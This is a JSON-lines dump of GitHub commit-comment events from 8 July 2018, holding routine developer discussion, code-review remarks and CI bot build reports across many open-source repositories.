{"id":"7933282216","type":"CommitCommentEvent","actor":{"login":"tdeux"},"repo":{"name":"OctoPrint/OctoPrint-Pushbullet"},"payload":{"comment":{"id":29631772,"position":null,"line":null,"path":null,"commit_id":"76e9470aac5bc0b3739197591d10a66630b95993","created_at":"2018-07-08T03:19:04Z","updated_at":"2018-07-08T03:19:04Z","author_association":"NONE","body":"This is sweet. Is there an esay way of adding a notifcation for an M600 gcode? It would be awesome to get notified when it's time to change filament."}},"created_at":"2018-07-08T03:19:04Z"}
{"id":"7933282242","type":"CommitCommentEvent","actor":{"login":"skaman123"},"repo":{"name":"opensourcepos/opensourcepos"},"payload":{"comment":{"id":29631773,"position":null,"line":null,"path":null,"commit_id":"1026ebb0ebd632ef7a9c660f8c6f59fd448e8f73","created_at":"2018-07-08T03:19:06Z","updated_at":"2018-07-08T03:19:06Z","author_association":"NONE","body":"ahh ok sorry for my english Sir\r\nwill i dont know where to address this little issue!..\r\n\r\ni've confused a little bit that I've been encircle in the image above\r\nit shown here that ajax post form ['csrf_ospos_v3'] must not be an array\r\nneither equal like this.\r\n"}},"created_at":"2018-07-08T03:19:06Z"}
{"id":"7933285249","type":"CommitCommentEvent","actor":{"login":"mikhailai"},"repo":{"name":"jwise/HoRNDIS"},"payload":{"comment":{"id":29631776,"position":null,"line":null,"path":null,"commit_id":"341669c1f010d169740c7ecbbb746e83e9b6c541","created_at":"2018-07-08T03:22:31Z","updated_at":"2018-07-08T03:22:31Z","author_association":"COLLABORATOR","body":"Hmm. I'd always assume the env variables required for the build would be set in \".bash_profile\", or such. I guess \"localconfig.mk\" allows us to avoid \"global\" settings, but have to copy the file for every cloned tree."}},"created_at":"2018-07-08T03:22:31Z"}
{"id":"7933291450","type":"CommitCommentEvent","actor":{"login":"ba371ce"},"repo":{"name":"FiloSottile/mkcert"},"payload":{"comment":{"id":29631792,"position":null,"line":null,"path":null,"commit_id":"564b41305c34b37318c3f3130c32d87980af074e","created_at":"2018-07-08T03:29:24Z","updated_at":"2018-07-08T03:29:24Z","author_association":"NONE","body":"zebras do not not you jump over red foxes"}},"created_at":"2018-07-08T03:29:24Z"}
{"id":"7933291978","type":"CommitCommentEvent","actor":{"login":"Benson2016"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29631793,"position":null,"line":null,"path":null,"commit_id":"af172aef670be1b450fff7c890a154c25d193f7a","created_at":"2018-07-08T03:29:58Z","updated_at":"2018-07-08T03:29:58Z","author_association":"NONE","body":"Why did I not see it in the wallet client after the submission?"}},"created_at":"2018-07-08T03:29:58Z"}
{"id":"7933294594","type":"CommitCommentEvent","actor":{"login":"Pinacolada64"},"repo":{"name":"Pinacolada64/ImageBBS"},"payload":{"comment":{"id":29631801,"position":null,"line":null,"path":null,"commit_id":"69ec3d3316d958b615fffb3c3c8f25c9a9424397","created_at":"2018-07-08T03:32:31Z","updated_at":"2018-07-08T03:32:31Z","author_association":"OWNER","body":"Thanks. That would be great. :smile:\r\n\r\nOf course it doesn't help that I disappear for weeks on end."}},"created_at":"2018-07-08T03:32:31Z"}
{"id":"7933294868","type":"CommitCommentEvent","actor":{"login":"haskell-jp-bot"},"repo":{"name":"haskell-jp/blog"},"payload":{"comment":{"id":29631802,"position":null,"line":null,"path":null,"commit_id":"8d13d952e9506c9b8ecc6b198926f28f3f7fab4e","created_at":"2018-07-08T03:32:50Z","updated_at":"2018-07-08T03:32:50Z","author_association":"NONE","body":"https://circleci.com/gh/haskell-jp/blog/478/artifacts/0/root/project/generated-site/index.html"}},"created_at":"2018-07-08T03:32:50Z"}
{"id":"7933297835","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29631804,"position":null,"line":null,"path":null,"commit_id":"b4ec76ac335d78632cc0590a1817c0ac3c1392bc","created_at":"2018-07-08T03:35:50Z","updated_at":"2018-07-08T03:35:50Z","author_association":"OWNER","body":"LLR: 0.70 (-2.94,2.94) [0.00,4.00]\r\nTotal: 2243 W: 501 L: 454 D: 1288"}},"created_at":"2018-07-08T03:35:50Z"}
{"id":"7933303219","type":"CommitCommentEvent","actor":{"login":"amar8118"},"repo":{"name":"amar8118/XposedInstaller"},"payload":{"comment":{"id":29631813,"position":null,"line":null,"path":null,"commit_id":"001cf42a91dfb3ec330f5101624c52f216d5a837","created_at":"2018-07-08T03:42:08Z","updated_at":"2018-07-08T03:42:08Z","author_association":"OWNER","body":"nice try again, i hope success "}},"created_at":"2018-07-08T03:42:08Z"}
{"id":"7933304813","type":"CommitCommentEvent","actor":{"login":"jameskleeh"},"repo":{"name":"micronaut-projects/micronaut-core"},"payload":{"comment":{"id":29631818,"position":null,"line":null,"path":null,"commit_id":"358a0099d116801cd3b16fedb190194fe3a6ad1a","created_at":"2018-07-08T03:44:04Z","updated_at":"2018-07-08T03:44:04Z","author_association":"CONTRIBUTOR","body":"This change is the cause of https://github.com/micronaut-projects/micronaut-core/issues/358. What is the reasoning for this? Shouldn't the user be in control of whether the health endpoint should require authentication?"}},"created_at":"2018-07-08T03:44:04Z"}
{"id":"7933306058","type":"CommitCommentEvent","actor":{"login":"HuaTrung"},"repo":{"name":"ducthong230497/Metroid"},"payload":{"comment":{"id":29631822,"position":null,"line":null,"path":null,"commit_id":"6444c2b261a4fd6ad94572c29fd1267f320641b3","created_at":"2018-07-08T03:45:31Z","updated_at":"2018-07-08T03:45:31Z","author_association":"COLLABORATOR","body":"You did a good job and I'm really happy for our team. Just keep doing."}},"created_at":"2018-07-08T03:45:31Z"}
{"id":"7933308887","type":"CommitCommentEvent","actor":{"login":"kali076"},"repo":{"name":"gmathew90/MyProjects"},"payload":{"comment":{"id":29631824,"position":1,"line":1,"path":"Mood Meter/README.md","commit_id":"b230d465b578301fb81bf79d9ca9427dd6e3091d","created_at":"2018-07-08T03:48:43Z","updated_at":"2018-07-08T03:48:43Z","author_association":"NONE","body":"Yo"}},"created_at":"2018-07-08T03:48:43Z"}
{"id":"7933310898","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631829,"position":null,"line":null,"path":null,"commit_id":"ea420d8607c65cd75fce3eea1cceed3ed2c90142","created_at":"2018-07-08T03:51:00Z","updated_at":"2018-07-08T03:51:00Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T03:51:00Z"}
{"id":"7933315140","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29631833,"position":null,"line":null,"path":null,"commit_id":"2245a04feecfe66e6fbcf6e05fa5b2883773e4b5","created_at":"2018-07-08T03:56:01Z","updated_at":"2018-07-08T03:56:01Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-08T03:56:01Z"}
{"id":"7933316232","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"kangax/html-minifier"},"payload":{"comment":{"id":29631834,"position":4,"line":6,"path":"README.md","commit_id":"68c978c2318d453850024a2ef5a07dcfd5a59439","created_at":"2018-07-08T03:57:23Z","updated_at":"2018-07-08T03:57:23Z","author_association":"COLLABORATOR","body":"`eslint` no longer supports the range of Node.js platforms that we do, rendering that particular badge meaningless."}},"created_at":"2018-07-08T03:57:23Z"}
{"id":"7933317135","type":"CommitCommentEvent","actor":{"login":"nnbaokhang"},"repo":{"name":"HashNuke/tic-tac-toe-coffeescript"},"payload":{"comment":{"id":29631837,"position":61,"line":61,"path":"app.coffee","commit_id":"a40772eea8f05d85ee3cc6f14589e0662d28321e","created_at":"2018-07-08T03:58:29Z","updated_at":"2018-07-08T03:58:29Z","author_association":"NONE","body":"asdsadsada"}},"created_at":"2018-07-08T03:58:29Z"}
{"id":"7933317388","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"kangax/html-minifier"},"payload":{"comment":{"id":29631838,"position":4,"line":6,"path":"README.md","commit_id":"68c978c2318d453850024a2ef5a07dcfd5a59439","created_at":"2018-07-08T03:58:49Z","updated_at":"2018-07-08T03:58:49Z","author_association":"COLLABORATOR","body":"Not really, no. The badge refers to all devDependencies."}},"created_at":"2018-07-08T03:58:49Z"}
{"id":"7933320621","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"kangax/html-minifier"},"payload":{"comment":{"id":29631850,"position":4,"line":6,"path":"README.md","commit_id":"68c978c2318d453850024a2ef5a07dcfd5a59439","created_at":"2018-07-08T04:01:56Z","updated_at":"2018-07-08T04:01:56Z","author_association":"COLLABORATOR","body":"How am I going to tell if any other devDependencies are out of date if it is constantly stuck in state?"}},"created_at":"2018-07-08T04:01:56Z"}
{"id":"7933322327","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"kangax/html-minifier"},"payload":{"comment":{"id":29631854,"position":4,"line":6,"path":"README.md","commit_id":"68c978c2318d453850024a2ef5a07dcfd5a59439","created_at":"2018-07-08T04:03:50Z","updated_at":"2018-07-08T04:03:50Z","author_association":"COLLABORATOR","body":"The badge changes colors depending on some factors.\r\n\r\nAlso, IMO\r\n\r\n1. we should switch back to grunt-eslint\r\n2. drop node.js 4.x and ES6-ify the code base along with a major version bump\r\n\r\nWe should not endorse obsolete Node.js versions."}},"created_at":"2018-07-08T04:03:50Z"}
{"id":"7933322350","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29631855,"position":null,"line":null,"path":null,"commit_id":"d51665a7d1615566a689c259b3e7d567d0957030","created_at":"2018-07-08T04:03:51Z","updated_at":"2018-07-08T04:03:51Z","author_association":"OWNER","body":"Also adjusted targeting parameters, population size, and creature statistics"}},"created_at":"2018-07-08T04:03:51Z"}
{"id":"7933326385","type":"CommitCommentEvent","actor":{"login":"avih"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":29631858,"position":null,"line":null,"path":null,"commit_id":"945303a92ecac73ba430b9eac0f10279cd95a32a","created_at":"2018-07-08T04:08:16Z","updated_at":"2018-07-08T04:08:16Z","author_association":"CONTRIBUTOR","body":"Thanks, confirmed #5937 works for me."}},"created_at":"2018-07-08T04:08:16Z"}
{"id":"7933327267","type":"CommitCommentEvent","actor":{"login":"Nickdv9"},"repo":{"name":"nobodytouchmyboost/android_device_xiaomi_msm8956-common"},"payload":{"comment":{"id":29631859,"position":null,"line":null,"path":null,"commit_id":"dbe3f32ccd32da6c886848b0cd949f46ecc94b5a","created_at":"2018-07-08T04:09:20Z","updated_at":"2018-07-08T04:09:20Z","author_association":"CONTRIBUTOR","body":"Yes it spams constantly when u touch screen..unless u enable perfd.. perfd seems to fix it\r\nHowever thats not the only u can also try fixing it from device/qcom/common \r\nThis commit for example:\r\nhttps://github.com/CypherOS/device_qcom_common/commit/ed23aade7ba2050967c7599cc51528478128b37e"}},"created_at":"2018-07-08T04:09:20Z"}
{"id":"7933328152","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29631860,"position":2,"line":243,"path":"src/emu/emumem.h","commit_id":"faac6a63e789dbbbca526de2eed624d1c28db733","created_at":"2018-07-08T04:10:15Z","updated_at":"2018-07-08T04:10:15Z","author_association":"MEMBER","body":"It didn't come from this commit, but what's with the `static inline constexpr` here?  In C++, `inline` on a free function suppresses export, making `static` redundant, and `constexpr` implies inline, making `inline` redundant.  Is it just supposed to be keyword soup for fun?"}},"created_at":"2018-07-08T04:10:15Z"}
{"id":"7933328289","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631861,"position":null,"line":null,"path":null,"commit_id":"ea420d8607c65cd75fce3eea1cceed3ed2c90142","created_at":"2018-07-08T04:10:24Z","updated_at":"2018-07-08T04:10:24Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2931 of 2931 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T04:10:24Z"}
{"id":"7933329012","type":"CommitCommentEvent","actor":{"login":"lin714093880"},"repo":{"name":"luogu-dev/markdown-it-katex"},"payload":{"comment":{"id":29631862,"position":null,"line":null,"path":null,"commit_id":"9d6eec6f2d012baa3b01024058b789bc4a079442","created_at":"2018-07-08T04:11:13Z","updated_at":"2018-07-08T04:11:13Z","author_association":"MEMBER","body":"That would cause a giant BC break."}},"created_at":"2018-07-08T04:11:13Z"}
{"id":"7933329221","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"kangax/html-minifier"},"payload":{"comment":{"id":29631863,"position":4,"line":6,"path":"README.md","commit_id":"68c978c2318d453850024a2ef5a07dcfd5a59439","created_at":"2018-07-08T04:11:30Z","updated_at":"2018-07-08T04:11:30Z","author_association":"COLLABORATOR","body":"> The badge changes colors depending on some factors.\r\n\r\nIf you have a way to turn it green without using an incompatible version of eslint, I'm all ears.\r\n\r\n> drop node.js 4.x and ES6-ify the code base along with a major version bump\r\n\r\nI'm actively using JavaScript in my line of work, so any ES6 will be getting in the way of backward compatibility.\r\n\r\n> We should not endorse obsolete Node.js versions.\r\n\r\nI don't work for Node.js - just because someone declares their product obsolete does not mean others aren't using a verified & reliable option."}},"created_at":"2018-07-08T04:11:30Z"}
{"id":"7933329346","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29631864,"position":5,"line":643,"path":"src/emu/devcb.h","commit_id":"faac6a63e789dbbbca526de2eed624d1c28db733","created_at":"2018-07-08T04:11:40Z","updated_at":"2018-07-08T04:11:40Z","author_association":"MEMBER","body":"This can't possibly be right - `devcb_read` isn't a template, `delegate_device_class_t` is an alias created with `using` so `typename` here is a syntax error."}},"created_at":"2018-07-08T04:11:40Z"}
{"id":"7933329836","type":"CommitCommentEvent","actor":{"login":"SherryNa"},"repo":{"name":"SherryNa/SherryNa.github.io"},"payload":{"comment":{"id":29631865,"position":null,"line":null,"path":null,"commit_id":"58a6b8ed846c540fbcdb2ee4730bf7e2566e4369","created_at":"2018-07-08T04:12:14Z","updated_at":"2018-07-08T04:12:14Z","author_association":"OWNER","body":"CNAME"}},"created_at":"2018-07-08T04:12:14Z"}
{"id":"7933330530","type":"CommitCommentEvent","actor":{"login":"abankrah"},"repo":{"name":"abankrah/Data_Science_Assignment_Session-4-Assignment-4.21287-problem-statement-1"},"payload":{"comment":{"id":29631867,"position":null,"line":null,"path":null,"commit_id":"ecddbdb50f31816d95c6b49c18a03d9bbc82bf74","created_at":"2018-07-08T04:13:01Z","updated_at":"2018-07-08T04:13:01Z","author_association":"OWNER","body":"![problem statement 1](https://user-images.githubusercontent.com/39193389/42416666-7d3cf672-8243-11e8-9d89-4d94b428863b.PNG)\r\n![problem statement 2](https://user-images.githubusercontent.com/39193389/42416674-aa7a2902-8243-11e8-8892-ff99d81e672d.PNG)\r\n"}},"created_at":"2018-07-08T04:13:01Z"}
{"id":"7933332760","type":"CommitCommentEvent","actor":{"login":"sdgathman"},"repo":{"name":"whyscream/pymilter"},"payload":{"comment":{"id":29631874,"position":null,"line":null,"path":null,"commit_id":"de1b82cfda2091c08b23ec44732a8361b1950977","created_at":"2018-07-08T04:15:22Z","updated_at":"2018-07-08T04:15:22Z","author_association":"NONE","body":"The WRONG WRONG result is actually ... wrong!  It is a bug in the python email package that I haven't worked around yet.  "}},"created_at":"2018-07-08T04:15:22Z"}
{"id":"7933334014","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29631875,"position":13,"line":1364,"path":"src/emu/devcb.h","commit_id":"faac6a63e789dbbbca526de2eed624d1c28db733","created_at":"2018-07-08T04:16:41Z","updated_at":"2018-07-08T04:16:41Z","author_association":"MEMBER","body":"The `delegate_builder::` is a redundant qualifier here, but that aside, the `wrapped_builder` is in class scope, so making it a friend doesn't actually do anything.  Inner classes can access private members, and we depend on this in various other places (e.g. the side-effect suppressor in `device_t`).  Does this really make it work or not?"}},"created_at":"2018-07-08T04:16:41Z"}
{"id":"7933336542","type":"CommitCommentEvent","actor":{"login":"fmtono"},"repo":{"name":"fmtono/assessment"},"payload":{"comment":{"id":29631876,"position":null,"line":null,"path":null,"commit_id":"bc55b83740329e3ba0ad4f179324b42b09137e70","created_at":"2018-07-08T04:19:27Z","updated_at":"2018-07-08T04:19:27Z","author_association":"OWNER","body":"見出しを丁寧に変更"}},"created_at":"2018-07-08T04:19:27Z"}
{"id":"7933336965","type":"CommitCommentEvent","actor":{"login":"abankrah"},"repo":{"name":"abankrah/Data_Science_Assignment_Session-4-Assignment-4.21287"},"payload":{"comment":{"id":29631877,"position":null,"line":null,"path":null,"commit_id":"87f31ac674a1ad47125f23f64f3d901bfef4ebc5","created_at":"2018-07-08T04:19:54Z","updated_at":"2018-07-08T04:19:54Z","author_association":"OWNER","body":"![problem statement 1](https://user-images.githubusercontent.com/39193389/42416710-9c5f48ba-8244-11e8-99fa-b16bd86cb8b1.PNG)\r\n![problem statement 2](https://user-images.githubusercontent.com/39193389/42416711-a17344d2-8244-11e8-8f23-87e39e352e9b.PNG)\r\n"}},"created_at":"2018-07-08T04:19:54Z"}
{"id":"7933339433","type":"CommitCommentEvent","actor":{"login":"CestDiego"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29631882,"position":28,"line":28,"path":"core/core-env.el","commit_id":"6220ace290b247265de8fac66bd9e84bef388326","created_at":"2018-07-08T04:22:36Z","updated_at":"2018-07-08T04:22:36Z","author_association":"CONTRIBUTOR","body":"@Blaisorblade  will this work with other shells like `zsh` as well?"}},"created_at":"2018-07-08T04:22:36Z"}
{"id":"7933345909","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631890,"position":null,"line":null,"path":null,"commit_id":"ea420d8607c65cd75fce3eea1cceed3ed2c90142","created_at":"2018-07-08T04:30:06Z","updated_at":"2018-07-08T04:30:06Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2971 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T04:30:06Z"}
{"id":"7933346827","type":"CommitCommentEvent","actor":{"login":"Farhadkabuli"},"repo":{"name":"Farhadkabuli/homwork5"},"payload":{"comment":{"id":29631893,"position":null,"line":null,"path":null,"commit_id":"f66776873ac756621d01b9edba6b973e5c4d716a","created_at":"2018-07-08T04:30:57Z","updated_at":"2018-07-08T04:30:57Z","author_association":"OWNER","body":"this my fifth homework\r\n"}},"created_at":"2018-07-08T04:30:57Z"}
{"id":"7933350283","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631901,"position":null,"line":null,"path":null,"commit_id":"ea420d8607c65cd75fce3eea1cceed3ed2c90142","created_at":"2018-07-08T04:34:58Z","updated_at":"2018-07-08T04:34:58Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-08T04:34:58Z"}
{"id":"7933352516","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"jwise/HoRNDIS"},"payload":{"comment":{"id":29631906,"position":null,"line":null,"path":null,"commit_id":"341669c1f010d169740c7ecbbb746e83e9b6c541","created_at":"2018-07-08T04:37:39Z","updated_at":"2018-07-08T04:37:39Z","author_association":"OWNER","body":"I tend to like the localconfig.mk approach precisely because it does not clutter the .bash_profile  :-) \n\nOn Jul 7, 2018, 20:22, at 20:22, Mikhail Iakhiaev <notifications@github.com> wrote:\n>Hmm. I'd always assume the env variables required for the build would\n>be set in \".bash_profile\", or such. I guess \"localconfig.mk\" allows us\n>to avoid \"global\" settings, but have to copy the file for every cloned\n>tree.\n>\n>-- \n>You are receiving this because you authored the thread.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/jwise/HoRNDIS/commit/341669c1f010d169740c7ecbbb746e83e9b6c541#commitcomment-29631776\n"}},"created_at":"2018-07-08T04:37:39Z"}
{"id":"7933356221","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29631910,"position":null,"line":null,"path":null,"commit_id":"814175ef056cd2a06621385d18e9c9157ab49eb4","created_at":"2018-07-08T04:41:42Z","updated_at":"2018-07-08T04:41:42Z","author_association":"OWNER","body":"https://onlinelibrary.wiley.com/doi/full/10.1002/adma.201704407"}},"created_at":"2018-07-08T04:41:42Z"}
{"id":"7933356295","type":"CommitCommentEvent","actor":{"login":"Joselagem"},"repo":{"name":"Joselagem/karafun-touch"},"payload":{"comment":{"id":29631911,"position":null,"line":null,"path":null,"commit_id":"63e90e60c3bc73b7f2112da19a2f81993dc4a805","created_at":"2018-07-08T04:41:48Z","updated_at":"2018-07-08T04:41:48Z","author_association":"OWNER","body":"Add Spanish Language\r\nAñadido Idioma Español"}},"created_at":"2018-07-08T04:41:48Z"}
{"id":"7933360153","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29631921,"position":null,"line":null,"path":null,"commit_id":"814175ef056cd2a06621385d18e9c9157ab49eb4","created_at":"2018-07-08T04:46:16Z","updated_at":"2018-07-08T04:46:16Z","author_association":"OWNER","body":"CLOTHES PRESS"}},"created_at":"2018-07-08T04:46:16Z"}
{"id":"7933363032","type":"CommitCommentEvent","actor":{"login":"TitanSnow"},"repo":{"name":"luogu-dev/markdown-it-katex"},"payload":{"comment":{"id":29631931,"position":null,"line":null,"path":null,"commit_id":"9d6eec6f2d012baa3b01024058b789bc4a079442","created_at":"2018-07-08T04:49:24Z","updated_at":"2018-07-08T04:49:24Z","author_association":"NONE","body":"Have you considered corner cases? e.g. use dollar sign to present price?"}},"created_at":"2018-07-08T04:49:24Z"}
{"id":"7933363742","type":"CommitCommentEvent","actor":{"login":"lin714093880"},"repo":{"name":"luogu-dev/markdown-it-katex"},"payload":{"comment":{"id":29631933,"position":null,"line":null,"path":null,"commit_id":"9d6eec6f2d012baa3b01024058b789bc4a079442","created_at":"2018-07-08T04:50:13Z","updated_at":"2018-07-08T04:50:13Z","author_association":"MEMBER","body":"Should be escaped in this case"}},"created_at":"2018-07-08T04:50:13Z"}
{"id":"7933365791","type":"CommitCommentEvent","actor":{"login":"inovramadani"},"repo":{"name":"karimhamdanali/codility"},"payload":{"comment":{"id":29631936,"position":null,"line":null,"path":null,"commit_id":"bf99496316bea7b8403016f470260b17ea16244f","created_at":"2018-07-08T04:52:46Z","updated_at":"2018-07-08T04:52:46Z","author_association":"NONE","body":"Peace, simpler way: https://app.codility.com/demo/results/trainingBFETZ2-2GY/"}},"created_at":"2018-07-08T04:52:46Z"}
{"id":"7933368254","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631941,"position":null,"line":null,"path":null,"commit_id":"9290bb76192afb16d7056589b4e3e7a1ba6d2930","created_at":"2018-07-08T04:55:44Z","updated_at":"2018-07-08T04:55:44Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.22%25-red.png)</a> \n"}},"created_at":"2018-07-08T04:55:44Z"}
{"id":"7933369230","type":"CommitCommentEvent","actor":{"login":"shuai102102"},"repo":{"name":"shuai102102/gmall_mine"},"payload":{"comment":{"id":29631947,"position":null,"line":null,"path":null,"commit_id":"b7a9c919414314b95eb2ee958741e3b149e38af5","created_at":"2018-07-08T04:56:58Z","updated_at":"2018-07-08T04:56:58Z","author_association":"OWNER","body":"creat at 2018/7/8"}},"created_at":"2018-07-08T04:56:58Z"}
{"id":"7933374063","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631957,"position":null,"line":null,"path":null,"commit_id":"ea420d8607c65cd75fce3eea1cceed3ed2c90142","created_at":"2018-07-08T05:02:00Z","updated_at":"2018-07-08T05:02:00Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea420d8607c65cd75fce3eea1cceed3ed2c90142-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T05:02:00Z"}
{"id":"7933374875","type":"CommitCommentEvent","actor":{"login":"sajinpgupta"},"repo":{"name":"sajinpgupta/Deep-Learning-Car-Detector"},"payload":{"comment":{"id":29631960,"position":null,"line":null,"path":null,"commit_id":"a5ac3a5801a947d9d338633f0caec7f5a9660922","created_at":"2018-07-08T05:02:50Z","updated_at":"2018-07-08T05:02:50Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-08T05:02:50Z"}
{"id":"7933375348","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29631961,"position":null,"line":null,"path":null,"commit_id":"76eb69bd4d6d1ffa45403d0fa9aab4efe1b482c1","created_at":"2018-07-08T05:03:19Z","updated_at":"2018-07-08T05:03:19Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/common_params.php, js/src/messages.php"}},"created_at":"2018-07-08T05:03:19Z"}
